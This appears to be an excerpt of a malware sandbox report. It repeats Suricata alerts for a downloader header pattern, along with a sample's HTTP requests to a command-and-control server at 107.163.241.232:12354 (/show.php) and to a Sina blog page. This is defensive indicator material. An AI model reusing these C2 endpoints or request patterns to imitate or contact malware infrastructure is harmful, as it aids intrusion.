Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49186 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:65528 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:51537 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:60904 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:56382 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:51658 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:54887 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62256 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:65178 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62610 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:53961 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:58418 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50940 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64241 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:57918 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:59960 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:51444 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:53875 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:59852 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:57709 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:60763 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62613 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:58949 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:54800 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:63631 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64270 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49353 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49191 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:65253 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64406 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:65101 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64546 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64868 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49188 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64711 -> 107.163.241.232:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64990 -> 107.163.241.232:12354
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
